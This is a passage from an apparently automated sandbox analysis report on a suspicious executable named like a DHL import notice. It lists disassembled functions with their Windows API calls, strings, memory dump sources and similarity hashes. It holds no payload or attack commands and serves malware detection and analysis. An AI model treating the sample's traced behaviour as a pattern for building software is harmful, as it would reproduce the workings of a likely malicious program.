                                                                                          • DeleteDC.GDI32(?), ref: 008526E8
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 008526F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                          • String ID: (
                                                                                          • API String ID: 2598888154-3887548279
                                                                                          • Opcode ID: 35ad1e0d69e417ebcf009b0aa8d9fa12c14777195a57d627ec0ecbee03f6b098
                                                                                          • Instruction ID: 6c4240b24282d9c3df2f951e5b05fa6b295e9fec621c426edc9043eee227a37a
                                                                                          • Opcode Fuzzy Hash: 35ad1e0d69e417ebcf009b0aa8d9fa12c14777195a57d627ec0ecbee03f6b098
                                                                                          • Instruction Fuzzy Hash: 2861C275D00219EFCF04CFA8D885AAEBBF5FF58310F20852AE955A7250E774A951CF90
                                                                                          Function 0080DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0080DAA1
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D659
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D66B
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D67D
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D68F
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6A1
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6B3
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6C5
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6D7
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6E9
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6FB
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D70D
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D71F
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D731
                                                                                          • _free.LIBCMT ref: 0080DA96
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 0080DAB8
                                                                                          • _free.LIBCMT ref: 0080DACD
                                                                                          • _free.LIBCMT ref: 0080DAD8
                                                                                          • _free.LIBCMT ref: 0080DAFA
                                                                                          • _free.LIBCMT ref: 0080DB0D
                                                                                          • _free.LIBCMT ref: 0080DB1B
                                                                                          • _free.LIBCMT ref: 0080DB26
                                                                                          • _free.LIBCMT ref: 0080DB5E
                                                                                          • _free.LIBCMT ref: 0080DB65
                                                                                          • _free.LIBCMT ref: 0080DB82
                                                                                          • _free.LIBCMT ref: 0080DB9A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: d221aaea8a0face14a1d2a030a8561422508190393d076870cf9c1a97118f098
                                                                                          • Instruction ID: 4b3e038c37f3947ddf00c883df644e602c62581836cf3f487601a93a895efe1b
                                                                                          • Opcode Fuzzy Hash: d221aaea8a0face14a1d2a030a8561422508190393d076870cf9c1a97118f098
                                                                                          • Instruction Fuzzy Hash: 48314A326043059FEBA1AAB9EC49F6A7BE9FF00320F654429E449D71D1DB75EC40CB21
                                                                                          Function 0083365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0083369C
                                                                                          • _wcslen.LIBCMT ref: 008336A7
                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00833797
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0083380C
                                                                                          • GetDlgCtrlID.USER32(?), ref: 0083385D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00833882
                                                                                          • GetParent.USER32(?), ref: 008338A0
                                                                                          • ScreenToClient.USER32(00000000), ref: 008338A7
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00833921
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0083395D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                          • String ID: %s%u
                                                                                          • API String ID: 4010501982-679674701
                                                                                          • Opcode ID: f8cd6f2478a0f2095b67fc2140483778a3df19f2b8eb906abf559145282ba3f1
                                                                                          • Instruction ID: 7d31e5716ee9d982b44fb3ef6930f71ad187e797cca2bdb9b330812d55d73cd0
                                                                                          • Opcode Fuzzy Hash: f8cd6f2478a0f2095b67fc2140483778a3df19f2b8eb906abf559145282ba3f1
                                                                                          • Instruction Fuzzy Hash: BA91B371204606EFD719DF24C885BBAF7A8FF84350F008629FA99C6190DB70EA45CBD1
                                                                                          Function 00834954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00834994
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 008349DA
                                                                                          • _wcslen.LIBCMT ref: 008349EB
                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 008349F7
                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00834A2C
                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00834A64
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00834A9D
                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00834AE6
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00834B20
                                                                                          • GetWindowRect.USER32(?,?), ref: 00834B8B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                          • String ID: ThumbnailClass
                                                                                          • API String ID: 1311036022-1241985126
                                                                                          • Opcode ID: c1e56b72643d81bc27f175f908d645b5d19be7aa3cf4016d144fc8bf3e46e1e3
                                                                                          • Instruction ID: fbdacc9a1dfcc3554b3f169564b21094c55187747c021e7e2f253e13833de065
                                                                                          • Opcode Fuzzy Hash: c1e56b72643d81bc27f175f908d645b5d19be7aa3cf4016d144fc8bf3e46e1e3
                                                                                          • Instruction Fuzzy Hash: C091DC710042099FDB04DF54C885BBABBE8FF84314F04A46AFE85DA196EB74ED45CBA1
                                                                                          Function 0085CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0085CC64
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0085CC8D
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0085CD48
                                                                                            • Part of subcall function 0085CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0085CCAA
                                                                                            • Part of subcall function 0085CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0085CCBD
                                                                                            • Part of subcall function 0085CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0085CCCF
                                                                                            • Part of subcall function 0085CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0085CD05
                                                                                            • Part of subcall function 0085CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0085CD28
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0085CCF3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                          • API String ID: 2734957052-4033151799
                                                                                          • Opcode ID: 9e2a95480fdcaa9885983e7d63e96ad25af08737e6d715315ee68a1dc68cf28d
                                                                                          • Instruction ID: 14c1d695c5ce99c27acdb39cd2e002496f074bc446835827eeb9381fa4f3eaa5
                                                                                          • Opcode Fuzzy Hash: 9e2a95480fdcaa9885983e7d63e96ad25af08737e6d715315ee68a1dc68cf28d
                                                                                          • Instruction Fuzzy Hash: 06318C75901228BFDB219B94DC88EFFBB7CFF06741F010165F906E2240DAB49E499AA0
                                                                                          Function 00843D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00843D40
                                                                                          • _wcslen.LIBCMT ref: 00843D6D
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00843D9D
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00843DBE
                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00843DCE
                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00843E55
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00843E60
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00843E6B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                          • String ID: :$\$\??\%s
                                                                                          • API String ID: 1149970189-3457252023
                                                                                          • Opcode ID: ba981c75b77c48d20e7e2fc87b385bf425f3f069849fa711e62ad74e502f8219
                                                                                          • Instruction ID: 6ce5ead48b56516b227a41d75290e3eaf8e9affd5b87a163ab4d3025d414dde4
                                                                                          • Opcode Fuzzy Hash: ba981c75b77c48d20e7e2fc87b385bf425f3f069849fa711e62ad74e502f8219
                                                                                          • Instruction Fuzzy Hash: CE31B271900209ABDB209BA0DC49FEF37BCFF89700F1040B5F605D6160EBB497448B24
                                                                                          Function 0083E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • timeGetTime.WINMM ref: 0083E6B4
                                                                                            • Part of subcall function 007EE551: timeGetTime.WINMM(?,?,0083E6D4), ref: 007EE555
                                                                                          • Sleep.KERNEL32(0000000A), ref: 0083E6E1
                                                                                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0083E705
                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0083E727
                                                                                          • SetActiveWindow.USER32 ref: 0083E746
                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0083E754
                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0083E773
                                                                                          • Sleep.KERNEL32(000000FA), ref: 0083E77E
                                                                                          • IsWindow.USER32 ref: 0083E78A
                                                                                          • EndDialog.USER32(00000000), ref: 0083E79B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                          • String ID: BUTTON
                                                                                          • API String ID: 1194449130-3405671355
                                                                                          • Opcode ID: b55a1d3a6a7057c5d13d21e3115f3db29c71dc2ae08df7c2f7b812997c3567e4
                                                                                          • Instruction ID: 175bf9790af69dd8304b2f357a1c267277790549e9e24ca79848b85cf5cbfa46
                                                                                          • Opcode Fuzzy Hash: b55a1d3a6a7057c5d13d21e3115f3db29c71dc2ae08df7c2f7b812997c3567e4
                                                                                          • Instruction Fuzzy Hash: 33219670240205AFFF219FA4EC9DA353B69F7A6348F111425F556C2AF1DBB59C00CBA5
                                                                                          Function 0083E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0083EA5D
                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0083EA73
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083EA84
                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0083EA96
                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083EAA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: SendString$_wcslen
                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                          • API String ID: 2420728520-1007645807
                                                                                          • Opcode ID: f246c0752349aa29a073879fb213396116b4bd868d2261bcafa95050f2dd8c8c
                                                                                          • Instruction ID: 95da710c978e6f1ee2f2972417a033ef489e474060e08dfe7748a106b9258026
                                                                                          • Opcode Fuzzy Hash: f246c0752349aa29a073879fb213396116b4bd868d2261bcafa95050f2dd8c8c
                                                                                          • Instruction Fuzzy Hash: 2A115131A50269B9DB20B7A2DC4AEFF6E7CFBD1B40F04042AB411E22D1EEB45915C5B0
                                                                                          Function 00835CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00835CE2
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00835CFB
                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00835D59
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00835D69
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00835D7B
                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00835DCF
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00835DDD
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00835DEF
                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00835E31
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00835E44
                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00835E5A
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00835E67
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                          • String ID:
                                                                                          • API String ID: 3096461208-0
                                                                                          • Opcode ID: eb930f8fbe14ddf71682072492023bab73fb406c445b06f6049530c193cd89db
                                                                                          • Instruction ID: c70fb6daa0da91ce537c15b88a291d9e20177730b9385de4fba561dce0c86dd0
                                                                                          • Opcode Fuzzy Hash: eb930f8fbe14ddf71682072492023bab73fb406c445b06f6049530c193cd89db
                                                                                          • Instruction Fuzzy Hash: 495110B1B00605AFDF18CF68DD89AAE7BB5FB88301F558129F515E7290D7B49E00CB50
                                                                                          Function 007E8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007E8BE8,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8FC5
                                                                                          • DestroyWindow.USER32(?), ref: 007E8C81
                                                                                          • KillTimer.USER32(00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8D1B
                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00826973
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 008269A1
                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 008269B8
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000), ref: 008269D4
                                                                                          • DeleteObject.GDI32(00000000), ref: 008269E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 641708696-0
                                                                                          • Opcode ID: ce4813e779be7dfff67d03bbcde79955a7378a27f358ef98429ce0445c189b81
                                                                                          • Instruction ID: ca2b1168db82a0174d3510e389dcf30b963c4c11a73c8fa0288a957dbf85e861
                                                                                          • Opcode Fuzzy Hash: ce4813e779be7dfff67d03bbcde79955a7378a27f358ef98429ce0445c189b81
                                                                                          • Instruction Fuzzy Hash: F461BE30102650DFDF619F16D948B26BBF1FB4A312F24555DE0869AA70CB79ACD0CFA2
                                                                                          Function 007E9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          • GetSysColor.USER32(0000000F), ref: 007E9862
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ColorLongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 259745315-0
                                                                                          • Opcode ID: 0f883cf01d25103500c3fdbb187ae1f9fe6983222ca476ecc630375453c3185e
                                                                                          • Instruction ID: da79323291d0be51a6d9988239b6d14c985bd7c412f466db0a9c3e5edd1e6146
                                                                                          • Opcode Fuzzy Hash: 0f883cf01d25103500c3fdbb187ae1f9fe6983222ca476ecc630375453c3185e
                                                                                          • Instruction Fuzzy Hash: 9E41B032105690AFDB205F3A9C88BB93BA5FB1A330F155615FAA2872F2D7749C81DB11
                                                                                          Function 008396E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0081F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00839717
                                                                                          • LoadStringW.USER32(00000000,?,0081F7F8,00000001), ref: 00839720
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0081F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00839742
                                                                                          • LoadStringW.USER32(00000000,?,0081F7F8,00000001), ref: 00839745
                                                                                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00839866
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                          • API String ID: 747408836-2268648507
                                                                                          • Opcode ID: 5c16de24b4680f0567f6abba1d4fc2b1794bfc160d5fcd7b0dbe95c2775a70be
